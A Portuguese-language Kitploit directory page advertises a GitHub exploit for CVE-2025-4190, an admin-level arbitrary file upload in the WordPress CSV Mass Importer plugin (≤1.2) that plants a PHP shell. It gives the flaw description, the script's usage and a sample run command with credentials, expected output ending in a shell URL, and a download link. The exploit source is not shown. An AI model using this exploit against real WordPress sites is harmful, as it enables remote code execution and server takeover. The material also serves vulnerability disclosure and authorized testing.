Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-4190 — CSV Mass Importer <= 1.2 - Admin+ Upload Arbitrário de Arquivos | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-4190
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2025-4190

CVE-2025-4190

CSV Mass Importer <= 1.2 - Admin+ Upload Arbitrário de Arquivos

Ver Repositório
3há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-4190 — CSV Mass Importer do WordPress ≤ 1.2 Upload Arbitrário de Arquivos

WordPress Plugin
CVE
Status
Author


📌 Descrição

O plugin CSV Mass Importer (≤ 1.2) para WordPress contém uma vulnerabilidade de Upload Arbitrário de Arquivos por Admin+.
Devido à validação inadequada dos arquivos enviados, usuários com altos privilégios (como administradores) podem enviar arquivos arbitrários no servidor, mesmo quando isso deveria ser restrito — por exemplo, em configurações de multisite.

Esta vulnerabilidade permite que um invasor envie shells PHP ou arquivos maliciosos, levando à execução remota de código (RCE) no servidor.

Descoberto por Nxploited (Khaled Alenazi).


🔥 Detalhes

  • Nome do Plugin: CSV Mass Importer
  • Versão Afetada: ≤ 1.2
  • Tipo de Vulnerabilidade: Admin+ Upload Arbitrário de Arquivos
  • CVE: CVE-2025-4190
  • ID WPVDB: e525ece5-6e03-4aee-bf5b-6ae0b961f027
  • Pesquisador Original: Khaled Alenazi (Nxploited)
  • Site do Submissor: https://github.com/Nxploited
  • Verificado: ✅

  • 💻 Prova de Conceito (PoC)

    O plugin não verifica corretamente os arquivos enviados ao usar o recurso de importação CSV.
    Um arquivo ZIP manipulado contendo um shell PHP pode ser enviado e extraído para um diretório acessível publicamente.

    Exemplo de Caminho do Shell:

    root@kitploit:~
    <target-url>/wp-content/uploads/cmi-data/nxploited.php
    

    🚀 Uso

    Script

    Este repositório contém um script de exploit Python pronto: 4190.py

    Menu de Ajuda

    root@kitploit:~
    python CVE-2025-4190.py --help
    usage: 4190.py [-h] --url URL --username USERNAME --password PASSWORD
    
    WordPress CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload # By Nxploited (Khaled Alenazi)
    
    options:
      -h, --help            show this help message and exit
      --url, -u URL         Target WordPress site URL
      --username, -un USERNAME
                            WordPress admin username
      --password, -p PASSWORD
                            WordPress admin password
    

    Exemplo de Execução

    root@kitploit:~
    python CVE-2025-4190.py -u http://192.168.100.74:888/wordpress -un admin -p admin
    

    Saída Esperada

    root@kitploit:~
    [+] Logged in successfully.
    [+] Payload 'nxploited.zip' created successfully.
    [+] Payload uploaded successfully.
    [+] Shell URL: http://192.168.100.74:888/wordpress/wp-content/uploads/cmi-data/nxploited.php
    Exploited By Nxploited (Khaled_alenazi)
    

    🕰 Linha do Tempo

    • Publicado Publicamente: 2025-04-26 (cerca de 11 dias atrás)
    • Adicionado ao Banco de Dados: 2025-05-07 (cerca de 1 hora atrás)
    • Última Atualização: 2025-05-07 (cerca de 1 hora atrás)

    🛡 Referências

    • CVE-2025-4190 no WPScan

    ⚠ Aviso Legal

    Este código é fornecido apenas para fins educacionais.
    O autor não é responsável por qualquer uso indevido ou dano causado por este script.
    Use com responsabilidade e apenas em sistemas que você está autorizado a testar.


    Descoberto e desenvolvido por Khaled Alenazi (Nxploited) 🌟

    Baixar ferramenta